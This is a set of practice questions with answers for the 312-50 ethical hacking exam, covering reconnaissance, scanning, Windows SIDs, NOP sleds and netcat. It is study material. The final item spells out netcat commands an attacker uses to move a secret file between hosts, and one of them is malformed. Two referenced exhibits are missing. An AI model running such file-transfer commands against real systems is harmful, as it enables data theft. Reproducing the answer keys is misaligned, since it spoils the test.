312-50 Practice Test Questions

763 Questions


Topic 22, Penetration Testing Methodologies

A successful attack by a malicious hacker can be divided into five phases. Match the
order:






Joel and her team have been going through tons of garbage, recycled paper, and
other rubbish in order to find some information about the target they are attempting
to penetrate.
What would you call this kind of activity?


A. CI Gathering
B. Scanning
C. Dumpster Diving
D. Garbage Scooping

Answer: C. Dumpster Diving



A client has approached you with penetration test requirements. They are
concerned with the possibility of external threat, and have invested considerable
resources in protecting their Internet exposure. However, their main concern is the
possibility of an employee elevating his/her privileges and gaining access to
information outside of their respective department.
What kind of penetration test would you recommend that would best address the
client's concern?


A. A Black Box test
B. A Black Hat test
C. A Grey Box test
D. A Grey Hat test
E. A White Box test
F. A White Hat test

Answer: C. A Grey Box test



Peter extracts the SID list from a Windows 2000 Server machine using the hacking
tool “SIDExtractor”. Here is the output of the SIDs:
s-1-5-21-1125394485-807628933-54978560-100Johns
s-1-5-21-1125394485-807628933-54978560-652Rebecca
s-1-5-21-1125394485-807628933-54978560-412Sheela
s-1-5-21-1125394485-807628933-54978560-999Shawn
s-1-5-21-1125394485-807628933-54978560-777Somia
s-1-5-21-1125394485-807628933-54978560-500chang
s-1-5-21-1125394485-807628933-54978560-555Micah
From the above list identify the user account with System Administrator privileges.


A. John
B. Rebecca
C. Sheela
D. Shawn
E. Somia
F. Chang
G. Micah

Answer: F. Chang



Explanation: The SID of the built-in administrator will always follow this example:
S-1-5-domain-500

Exhibit:

 

Based on the following extract from the log of a compromised machine, what is the
hacker really trying to steal?

 


A. har.txt
B. SAM file
C. wwwroot
D. Repair file

Answer: B. SAM file



Explanation: He is actually trying to get the file har.txt but this file contains a copy of the
SAM file.

You are programming a buffer overflow exploit and you want to create a NOP sled of 200
bytes in the program exploit.c

What is the hexadecimal value of the NOP instruction?


A. 0x60
B. 0x80
C. 0x70
D. 0x90

Answer: D. 0x90



MX record priority increases as the number increases. (True/False)


A. True
B. False

Answer: B. False




Explanation: The highest priority MX record has the lowest number.

How do you defend against MAC attacks on a switch?


A. Disable SPAN port on the switch
B. Enable SNMP Trap on the switch
C. Configure IP security on the switch
D. Enable Port Security on the switch

Answer: D. Enable Port Security on the switch



Blane is a network security analyst for his company. From an outside IP, Blane performs an
XMAS scan using Nmap. Almost every port scanned does not elicit a response. What can
he infer from this kind of response?


A. These ports are open because they do not elicit a response.
B. He can tell that these ports are in stealth mode.
C. If a port does not respond to an XMAS scan using NMAP, that port is closed.
D. The scan was not performed correctly using NMAP since all ports, no matter what their
   state, will elicit some sort of response from an XMAS scan.

Answer: A. These ports are open because they do not elicit a response.



In which layer of the OSI model does ARP poisoning occur?


A. Transport Layer
B. Datalink Layer
C. Physical Layer
D. Application layer

Answer: B. Datalink Layer



You are the Security Administrator of Xtrinity, Inc. You write security policies and
conduct assessments to protect the company's network. During one of your periodic
checks to see how well policy is being observed by the employees, you discover an
employee has attached a modem to his telephone line and workstation. He has used
this modem to dial in to his workstation, thereby bypassing your firewall. A security
breach has occurred as a direct result of this activity. The employee explains that he
used the modem because he had to download software for a department project.
How would you resolve this situation?


A. Reconfigure the firewall
B. Conduct a needs analysis
C. Install a network-based IDS
D. Enforce the corporate security policy

Answer: D. Enforce the corporate security policy



Explanation: The security policy is meant to always be followed until changed. If a need
arises to perform actions that might violate the security policy, you'll have to find another way
to accomplish the task or wait until the policy has been changed.

An attacker runs netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234
He is worried about information being sniffed on the network. How would the
attacker use netcat to encrypt the information before transmitting onto the wire?


A. Machine A: netcat -l -p -s password 1234 < testfile
   Machine B: netcat <machine A IP> 1234
B. Machine A: netcat -l -e magickey -p 1234 < testfile
   Machine B: netcat <machine A IP> 1234
C. Machine A: netcat -l -p 1234 < testfile -pw password
   Machine B: netcat <machine A IP> 1234 -pw password
D. Use cryptcat instead of netcat

Answer: D. Use cryptcat instead of netcat



Explanation: Netcat cannot encrypt the file transfer itself; it would need a third-party
application such as openssl to encrypt/decrypt. Cryptcat is the standard netcat enhanced
with twofish encryption.

